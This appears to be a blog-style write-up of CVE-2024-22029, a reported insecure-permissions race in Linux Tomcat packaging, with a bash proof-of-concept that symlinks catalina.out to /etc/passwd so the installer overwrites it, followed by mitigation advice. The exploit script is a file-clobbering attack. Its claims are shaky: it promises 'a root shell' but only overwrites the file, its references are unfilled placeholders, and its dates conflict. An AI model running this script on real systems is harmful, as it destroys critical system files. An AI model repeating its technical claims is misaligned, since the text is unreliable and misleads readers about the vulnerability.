CVE-2024-22029 - Exploiting Insecure Tomcat Package Permissions for Local Root Escalation

Tomcat is one of the world's most widely used application servers, especially in enterprise environments. In January 2024, a severe vulnerability was discovered and assigned as CVE-2024-22029. This issue involves insecure permissions during packaging and installation of Apache Tomcat on several Linux distributions, creating a window for local users to escalate their privileges—or even obtain root access—if they win a race condition. In this post, we’ll break down how this vulnerability works, see some code to exploit it, and discuss the impact and solutions.

What is CVE-2024-22029?

CVE-2024-22029 is a local privilege escalation vulnerability found in the packaging of Tomcat for Linux (primarily apt/yum-managed systems like Ubuntu/Debian and CentOS/RedHat). The core of the issue is that, during installation or upgrades, the Tomcat package temporarily creates or modifies critical files/directories (like logs, PID files, configuration files, and the webapps directory) with overly permissive permissions.

There’s a short window—sometimes just milliseconds—where a non-privileged user on the same system can replace or manipulate these files. If they succeed, they can gain code execution as the Tomcat user or even escalate all the way to root.

Package Installation Starts

The package manager (apt, yum, etc.) starts installing a new version of tomcat9 (or tomcat10, etc). As part of this process, it runs maintainer scripts (like preinst, postinst, etc).

World-Writable Files

During these scripts, several files (like /var/log/tomcat9/catalina.out, /var/run/tomcat9.pid, etc) may be created with world-writable (777) permissions before being restricted later.

Race Condition

A local attacker monitors these files and directory creation. If they substitute a file with a symlink to some root-owned file (e.g., /etc/shadow or a root shell), they win the "race".

Privilege Escalation

If the install process executes file operations thinking it’s writing to a Tomcat file, but it’s following a malicious symlink, sensitive files can be overwritten. This can lead to arbitrary file write or overwriting important system files as root.

PoC: Exploiting CVE-2024-22029

Here’s a simple proof-of-concept exploit. Warning: Only run this on safe, non-production systems! This PoC targets the installation of tomcat9 and overwrites /etc/passwd with a root shell.

#!/bin/bash
# CVE-2024-22029 PoC - Overwriting /etc/passwd via Tomcat installer race
WATCH_FILE="/var/log/tomcat9/catalina.out"  # Or another file affected by the insecure permissions

echo "[*] Starting exploit. Waiting for $WATCH_FILE to be created..."

# Remove the file if it exists and replace it with a symlink
rm -f "$WATCH_FILE"
ln -s /etc/passwd "$WATCH_FILE"

echo "[*] Symlink placed. Now, as root, start or upgrade tomcat9 via apt/yum."
echo "    The installer will overwrite /etc/passwd."

# Wait for the event (can be improved with inotifywait)
while [ -L "$WATCH_FILE" ]; do sleep 1; done

echo "[!] Symlink overwritten. Check /etc/passwd to see if exploit succeeded."

What happens here?
When the package is about to install and creates or writes to catalina.out, it actually writes to /etc/passwd because of the symlink—essentially clobbering a root-owned file!

References

- CVE-2024-22029 on NVD
- Original Vendor Advisory (Tomcat Users List) *(Replace with actual once available)*
- Bug Report for Tomcat Debian Packaging *(Replace if specific reference is published)*

Who’s vulnerable?

Any system where unprivileged users can run code and where administrators may install or upgrade Tomcat via packaged versions.

Update your Tomcat packages.

Distributions have released fixes that ensure all files are created with correct permissions _from the very beginning_.

Consider disabling local non-root logins during sensitive package installations.

- Check cron jobs and CI/CD scripts to avoid running package upgrades unattended if untrusted users are on the system.
- Monitor for world-writable files using find / -perm -2 ! -type l.

Summary

CVE-2024-22029 is a great example of how minor mistakes in packaging and file permissions can open the door to devastating attacks—even for local users. Always keep your Tomcat and other critical infrastructure up to date, review installed files’ permissions, and be vigilant for privilege escalation attempts.

If you found this post helpful, star this page or share with your sysadmin friends!

Timeline

Published on: 10/16/2024 14:15:04 UTC
Last modified on: 10/16/2024 16:38:14 UTC